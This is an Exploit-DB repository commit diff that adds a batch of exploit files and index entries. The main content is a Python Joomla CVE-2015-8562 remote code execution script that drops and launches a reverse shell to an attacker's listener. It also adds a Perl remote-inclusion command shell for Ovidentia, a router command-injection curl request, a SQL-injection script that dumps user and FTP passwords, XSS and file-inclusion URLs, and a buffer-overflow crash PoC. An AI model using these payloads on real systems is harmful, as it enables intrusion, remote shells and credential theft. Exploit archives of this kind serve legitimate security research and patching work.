DB: 2015-12-22

12 new exploits

files.csv

@@ -35317,3 +35317,13 @@ id,file,description,date,author,platform,type,port
 39060,platforms/php/webapps/39060.txt,"XOS Shop 'goto' Parameter SQL Injection Vulnerability",2014-01-24,JoKeR_StEx,php,webapps,0
 39061,platforms/android/local/39061.txt,"GoToMeeting for Android Multiple Local Information Disclosure Vulnerabilities",2014-01-23,"Claudio J. Lacayo",android,local,0
 39062,platforms/php/webapps/39062.txt,"ZenPhoto SQL Injection",2014-01-24,KedAns-Dz,php,webapps,0
+39063,platforms/php/webapps/39063.txt,"WordPress WP e-Commerce Plugin Multiple Security Vulnerabilities",2014-01-24,KedAns-Dz,php,webapps,0
+39064,platforms/php/webapps/39064.txt,"Maian Uploader 4.0 Multiple Security Vulnerabilities",2014-01-24,KedAns-Dz,php,webapps,0
+39065,platforms/php/webapps/39065.txt,"Eventum Insecure File Permissions Vulnerability",2014-01-27,"High-Tech Bridge",php,webapps,0
+39066,platforms/php/webapps/39066.txt,"Eventum 'hostname' Parameter Remote Code Execution Vulnerability",2014-01-28,"High-Tech Bridge",php,webapps,0
+39067,platforms/windows/dos/39067.py,"Notepad++ NPPFtp Plugin 0.26.3 - Buffer Overflow",2015-12-21,R-73eN,windows,dos,0
+39068,platforms/php/webapps/39068.txt,"Ovidentia online Module 2.8 - GLOBALS[babAddonPhpPath] Remote File Inclusion",2015-12-21,bd0rk,php,webapps,0
+39069,platforms/php/webapps/39069.pl,"Ovidentia Widgets 1.0.61 - Remote Command Execution Exploit",2015-12-21,bd0rk,php,webapps,80
+39070,platforms/windows/dos/39070.txt,"Base64 Decoder 1.1.2 - SEH OverWrite PoC",2015-12-21,Un_N0n,windows,dos,0
+39073,platforms/cgi/dos/39073.txt,"Seowon Intech WiMAX SWC-9100 Router /cgi-bin/reboot.cgi Unauthenticated Remote Reboot DoS",2014-02-03,"Josue Rojas",cgi,dos,0
+39074,platforms/cgi/remote/39074.txt,"Seowon Intech WiMAX SWC-9100 Router /cgi-bin/diagnostic.cgi ping_ipaddr Parameter Remote Code Execution",2014-02-03,"Josue Rojas",cgi,remote,0

platforms/cgi/dos/39073.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/65306/info
+
+WiMAX SWC-9100 Mobile Router is prone to a security-bypass vulnerability and a command-injection vulnerability.
+
+Exploiting these issues could allow an attacker to bypass certain security restrictions or execute arbitrary commands in the context of the device. 
+
+http://www.example.com/cgi-bin/reboot.cgi?select_option_value=factory_default&reboot_option=on&action=Apply
+http://www.example.com/cgi-bin/reboot.cgi?select_option_value=default_reboot&reboot_option=on&action=Apply

platforms/cgi/remote/39074.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/65306/info
+ 
+WiMAX SWC-9100 Mobile Router is prone to a security-bypass vulnerability and a command-injection vulnerability.
+ 
+Exploiting these issues could allow an attacker to bypass certain security restrictions or execute arbitrary commands in the context of the device.
+ 
+curl -v --data "select_mode_ping=on&ping_ipaddr=127.0.0.1>/dev/null; ls 
+-lash /etc%23&ping_count=1&action=Apply&html_view=ping" 
+"http://www.example.com/cgi-bin/diagnostic.cgi" > /dev/null

platforms/php/webapps/38977.py

@@ -0,0 +1,44 @@
+'''
+   Simple PoC for Joomla Object Injection.
+   Gary @ Sec-1 ltd
+   http://www.sec-1.com/
+'''
+ 
+import requests #  easy_install requests
+ 
+def get_url(url, user_agent):
+ 
+    headers = {
+    'User-Agent': user_agent
+    }
+    cookies = requests.get(url,headers=headers).cookies
+    for _ in range(3):
+        response = requests.get(url, headers=headers,cookies=cookies)    
+    return response
+   
+def php_str_noquotes(data):
+    "Convert string to chr(xx).chr(xx) for use in php"
+    encoded = ""
+    for char in data:
+        encoded += "chr({0}).".format(ord(char))
+ 
+    return encoded[:-1]
+ 
+ 
+def generate_payload(php_payload):
+ 
+    php_payload = "eval({0})".format(php_str_noquotes(php_payload))
+ 
+    terminate = '\xf0\xfd\xfd\xfd';
+    exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
+    injected_payload = "{};JFactory::getConfig();exit".format(php_payload)    
+    exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
+    exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate
+ 
+    return exploit_template
+ 
+ 
+ 
+pl = generate_payload("system('touch /tmp/fx');")
+ 
+print get_url("http://172.31.6.242/", pl)

platforms/php/webapps/39033.py

@@ -0,0 +1,131 @@
+#!/usr/bin/env python
+
+# Exploit Title: Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header
+# Date: 12/17/2015
+# Exploit Author: original - Gary@ Sec-1 ltd, Modified - Andrew McNicol BreakPoint Labs (@0xcc_labs)
+# Vendor Homepage: https://www.joomla.org/
+# Software Link: http://joomlacode.org/gf/project/joomla/frs/
+# Version: Joomla 1.5 - 3.4.5
+# Tested on: Ubuntu 14.04.2 LTS (Joomla! 3.2.1 Stable)
+# CVE : CVE-2015-8562
+
+
+'''
+    Joomla 1.5 - 3.4.5 Object Injection RCE - CVE-2015-8562
+    PoC for CVE-2015-8562 to spawn a reverse shell or automate RCE
+
+    Original PoC from Gary@ Sec-1 ltd (http://www.sec-1.com): 
+    https://www.exploit-db.com/exploits/38977/
+
+    Vulnerability Info, Exploit, Detection:
+    https://breakpoint-labs.com/joomla-rce-cve-2015-8562/
+
+    Exploit modified to use "X-Forwarded-For" header instead of "User-Agent" to avoid default logged to access.log
+
+    Usage - Automate Blind RCE:
+    python joomla-rce-2-shell.py -t http://192.168.1.139/ --cmd
+    $ touch /tmp/newhnewh    
+
+    Usage - Spawn Reverse Shell using Pentestmonkey's Python one-liner and netcat listener on local host:
+    python joomla-rce-2-shell.py -t http://192.168.1.139/ -l 192.168.1.119 -p 4444
+    [-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: http://192.168.1.139/
+    [-] Uploading python reverse shell with LHOST:192.168.1.119 and LPORT:4444
+    <Response [200]>
+    [+] Spawning reverse shell....
+    <Response [200]>
+
+    Listening on [0.0.0.0] (family 0, port 4444)
+    $ python -c "import pty;pty.spawn('/bin/bash')"
+    www-data@ubuntu:/$ id
+    uid=33(www-data) gid=33(www-data) groups=33(www-data)
+    www-data@ubuntu:/$ 
+
+'''
+    
+import requests
+import subprocess
+import argparse
+import sys
+import base64
+ 
+# Heavy lifting from PoC author Gary@ Sec-1 ltd (http://www.sec-1.com)
+def get_url(url, user_agent):
+ 
+    headers = {
+    'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3', # Change default UA for Requests
+    'x-forwarded-for': user_agent   # X-Forwarded-For header instead of UA
+    }
+    cookies = requests.get(url,headers=headers).cookies
+    for _ in range(3):
+        response = requests.get(url, headers=headers,cookies=cookies)    
+    return response
+
+
+def php_str_noquotes(data):
+    "Convert string to chr(xx).chr(xx) for use in php"
+    encoded = ""
+    for char in data:
+        encoded += "chr({0}).".format(ord(char))
+ 
+    return encoded[:-1]
+
+ 
+def generate_payload(php_payload):
+ 
+    php_payload = "eval({0})".format(php_str_noquotes(php_payload))
+ 
+    terminate = '\xf0\xfd\xfd\xfd';
+    exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
+    injected_payload = "{};JFactory::getConfig();exit".format(php_payload)    
+    exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
+    exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate
+ 
+    return exploit_template
+
+
+def main():
+    parser = argparse.ArgumentParser(prog='cve-2015-8562.py', description='Automate blind RCE for Joomla vuln CVE-2015-8652')
+    parser.add_argument('-t', dest='RHOST', required=True, help='Remote Target Joomla Server')
+    parser.add_argument('-l', dest='LHOST', help='specifiy local ip for reverse shell')
+    parser.add_argument('-p', dest='LPORT', help='specifiy local port for reverse shell')
+    parser.add_argument('--cmd', dest='cmd', action='store_true', help='drop into blind RCE')
+
+    args = parser.parse_args()
+
+    if args.cmd:
+        print "[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: {}".format(args.RHOST)
+        print "[-] Dropping into shell-like environment to perform blind RCE"
+        while True:
+            command = raw_input('$ ')
+            cmd_str = "system('{}');".format(command)
+            pl = generate_payload(cmd_str)
+            print get_url(args.RHOST, pl)
+
+    # Spawn Reverse Shell using Netcat listener + Python shell on victim
+    elif args.LPORT and args.LPORT:
+        connection = "'{}', {}".format(args.LHOST, args.LPORT)
+
+        # pentestmonkey's Python reverse shell one-liner:
+        shell_str = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('''+connection+'''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'''
+        # Base64 encoded the Python reverse shell as some chars were messing up in the exploit
+        encoded_comm = base64.b64encode(shell_str)
+        # Stage 1 payload Str
+        payload = "echo {} | base64 -d > /tmp/newhnewh.py".format(encoded_comm)
+        print "[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: {}".format(args.RHOST)
+        print "[-] Uploading python reverse shell with LHOST {} and {}".format(args.LHOST, args.LPORT)
+        # Stage 1: Uploads the Python reverse shell to "/tmp/newhnewh.py"
+        pl = generate_payload("system('"+payload+"');")
+        print get_url(args.RHOST, pl)
+        # Spawns Shell listener using netcat on LHOST
+        listener = subprocess.Popen(args=["gnome-terminal", "--command=nc -lvp "+args.LPORT])
+        print "[+] Spawning reverse shell...."
+        # Stage 2: Executes Python reverse shell back to LHOST:LPORT
+        pl = generate_payload("system('python /tmp/newhnewh.py');")
+        print get_url(args.RHOST, pl)
+    else:
+        print '[!] missing arguments'
+        parser.print_help()
+
+
+if __name__ == "__main__":
+    main()

platforms/php/webapps/39063.txt

@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/65130/info
+
+The WP e-Commerce plugin for WordPress is prone to multiple security vulnerabilities, including:
+
+1. Multiple remote code-execution vulnerabilities.
+2. A local file-include vulnerability
+3. An arbitrary file-upload vulnerability
+
+An attacker can exploit these issues to execute arbitrary code, include arbitrary local files, upload arbitrary files to the affected computer that may result in arbitrary code execution within the context of the vulnerable application.
+
+WP e-Commerce 3.8.9.5 is vulnerable; other versions may also be affected. 
+
+Local file-include
+http://www.example.com/wp-e-commerce/wpsc-includes/misc.functions.php?image_name=[LFI]
+
+Remote code-execution
+http://www.example.com/wp-e-commerce/wpsc-admin/ajax.php?wpsc_action=[CMD]
+http://www.example.com/wp-e-commerce/wpsc-admin/display-sales-logs.php?c=[CMD] 

platforms/php/webapps/39064.txt

@@ -0,0 +1,59 @@
+source: http://www.securityfocus.com/bid/65137/info
+
+Maian Uploader is prone to multiple security vulnerabilities, including:
+
+1. An SQL-injection vulnerability
+2. Multiple cross-site scripting vulnerabilities
+
+Attackers can exploit these issues to access or modify data, exploit latent vulnerabilities in the underlying database, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Maian Uploader 4.0 is vulnerable; other versions may also be affected. 
+
++] Exploit (1) ' SQL Injection ' =>
+#
+# <?php
+#
+# /*
+#
+# - move.php (lines: 90 > 92 )
+# $q_acc = mysql_query("SELECT id,username FROM ".$database['prefix']."members 
+# WHERE id != '".$_POST['id']."' 
+# ORDER BY accname") or die(mysql_error());
+#
+# */
+#
+# $sqli = "SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,ftp_user,0x3a,ftp_pass SEPARATOR 0x2c20) FROM mu_members";
+#
+# $ch = curl_init();
+# curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
+# curl_setopt($ch, CURLOPT_URL, "http://[target]/[path]/admin/data_files/move.php");
+# curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
+# curl_setopt($ch, CURLOPT_POST, 1);
+# curl_setopt($ch, CURLOPT_POSTFIELDS, "id=$sqli");
+# $exploit = curl_exec ($ch);
+# curl_close($ch);
+# unset($ch);
+# echo $exploit;
+# ?>
+# 
+####
+#
+# [+] Exploit (2) ' XSRF/XSS ' =>
+#
+# - load_flv.js.php ( line : 25 ) 
+# document.write('<object type="application/x-shockwave-flash" .....
+# width="<?php echo $_GET['width']; ?>" 
+# height="<?php echo $_GET['height']; ?>
+#
+# XSS : "><h1>XsS by KedAns-Dz</h1>
+# XSS : "><script>Alert('XsS by KedAns-Dz');</script>
+#
+# http://127.0.0.1/uploader/admin/js/load_flv.js.php?width=[ XSS ]
+# http://127.0.0.1/uploader/js/load_flv.js.php?width=[ XSS ]
+#
+# [&] Exploit (3) ' Full Path Disclosure ' => 
+#
+# don't put ( &height= ) after width Xss and you get error 
+# Notice about ( Undefined index: height ) with the Full Path Dir.
+#
+######################################################################

platforms/php/webapps/39065.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/65186/info
+
+Eventum is prone to an insecure file-permission vulnerability.
+
+An attacker can exploit this issue to reinstall vulnerable application. This may aid in further attacks.
+
+Eventum 2.3.4 is vulnerable; other versions may also be affected. 
+
+Following example URI is available.
+
+http://www.example.com/setup/index.php 

platforms/php/webapps/39066.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/65196/info
+
+Eventum is prone to remote code execution vulnerability.
+
+Successfully exploiting this issue allows attackers to execute arbitrary PHP code in the context of the affected application.
+
+Eventum prior to 2.3.4 are vulnerable. 
+
+Following example URL is available.
+
+http://www.example.com/index.php?cmd=phpinfo%28%29; 

platforms/php/webapps/39068.txt

@@ -0,0 +1,25 @@
+# Title: Ovidentia Module online 2.8 GLOBALS[babAddonPhpPath] Remote File Include Vulnerability
+# Author: bd0rk
+# eMail: bd0rk[at]hackermail.com
+# Twitter: twitter.com/bd0rk
+# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fonline&file=online-2-8.zip&idf=832
+
+PoC:
+/online-2-8/programs/admin.php line 2
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+require_once( $GLOBALS['babAddonPhpPath']."functions.php");
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+[+]Exploit: http://[target]/online-2-8/programs/admin.php?GLOBALS[babAddonPhpPath]=EVIL_SHELLCODE?
+
+Description: The $GLOBALS['babAddonPhpPath']-parameter isn't declared before qequire_once.
+             So it's possible to compromise the web-server about it.
+             An attacker can inject s0me php-shellcode.
+             I think, it's a big problem in this web-software!
+
+Patch: You can declare the vulnerable parameter or use an alert.
+
+
+~~Greetz: x0r_32, m0rphin, GoLd_M, zone-h.org-Team~~
+
+

platforms/php/webapps/39069.pl

@@ -0,0 +1,72 @@
+# Title: Ovidentia Widgets 1.0.61 Remote Command Execution Exploit
+# Author: bd0rk
+# eMail: bd0rk[at]hackermail.com
+# Twitter: twitter.com/bd0rk
+# Tested on: Ubuntu-Linux
+# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FLibrairies+partagees%2FWidgets&file=widgets-1-0-61.zip&idf=870
+# The $GLOBALS['babInstallPath']-parameter in /programs/groups.php line 24 is vulnerable for it.
+# Use some shellcode / c99 for example.
+----------------
+~~Exploitcode~~
+----------------
+
+use LWP::UserAgent;
+use HTTP::Request;
+use LWP::Simple;
+use Getopt::Long;
+
+sub clear{
+system(($^O eq 'MSWin32') ? 'cls' : 'clear');
+}
+
+&clear();
+
+sub bd0rk {
+print "Ovidentia Widgets 1.0.61 Remote Command Execution Exploit\n";
+print "Sploit:\n";
+print "$0 -v \"http://[target]/path/programs/\" -shellcode \"http://[target]/shell.txt?\"\n\n";
+exit();
+}
+
+my $a = GetOptions (
+'v=s'          => \$v,
+'shellcode=s'   => \$shellcode
+);
+
+&bd0rk unless ($v);
+&bd0rk unless ($shellcode);
+
+&bd0rk if $bd0rk eq 1;
+
+chomp($v);
+chomp($shellcode);
+
+while (){
+
+print "[shellcode]:~\$ ";
+chomp($cmd=<STDIN>);
+
+if ($cmd eq "exit" || $cmd eq "quit") {
+exit 0;
+}
+my $agent = LWP::UserAgent->new;
+$in="?&act=cmd&cmd=" . $cmd . "&d=/&submit=1&cmd_txt=1";
+chomp($in);
+my $a = $v ."/widgets-1-0-61/programs/groups.php?GLOBALS[babInstallPath]=" . $shellcode . $in;
+chomp $a;
+my $request = HTTP::Request->new(Get => $a);
+my $resource = $agent->request($request);
+my $content = $resource->content;
+if ($resource->is_success){
+print $1,"\n" if ($content =~ m/readonly> (.*?)\<\/textarea>/mosix);
+}
+
+else
+{
+print "EXPLOIT FAILURE\n";
+exit(1);
+}
+}
+
+
+

platforms/windows/dos/39070.txt

@@ -0,0 +1,52 @@
+********************************************************************************************
+# Exploit: b64dec SEH OverWrite.
+# Date: 12/18/2015
+# Exploit Author: Un_N0n
+# Vendor: Tim Rohlfs
+# Software Link: http://4mhz.de/b64dec.html
+# Version: 1.1.2
+# Tested on: Windows 7 x64(64bit)
+********************************************************************************************
+
+[Dump]
+
+SEH chain of thread 00000EC0
+Address    SE handler
+024CFC50   b64dec.00458140
+024CFC5C   b64dec.004581B3
+024CFF28   b64dec.0045847C
+024CFF00   41414141               <-------
+41414141   *** CORRUPT ENTRY ***  <-------
+----------------------------------------------------
+024CFEE4   41414141  AAAA
+024CFEE8   41414141  AAAA
+024CFEEC   41414141  AAAA
+024CFEF0   41414141  AAAA
+024CFEF4   41414141  AAAA
+024CFEF8   41414141  AAAA
+024CFEFC   41414141  AAAA
+024CFF00   41414141  AAAA  Pointer to next SEH record  <-----
+024CFF04   41414141  AAAA  SE handler                  <----- 
+024CFF08   41414141  AAAA
+024CFF0C   41414141  AAAA
+024CFF10   41414141  AAAA
+024CFF14   41414141  AAAA
+024CFF18   41414141  AAAA
+
+
+[How to?]
+1 - Open up b64dec.exe
+2 - In Search field, paste in the contents of Crash.txt
+3 - Hit 'Decode'
+
+~ Software Crashes due to SEH Over-Write.
+
+[Crash.txt?]
+AAAAAAAAAAAAAAAAAAAAAAAAAA.......620 BBBB CCCC DDDDDDDDDDDDDDDDDDD
+
+--------------------------------------|-----|
+									 NSEH  SEH
+
+[Extra Info]
+Offset = 620
+********************************************************************************************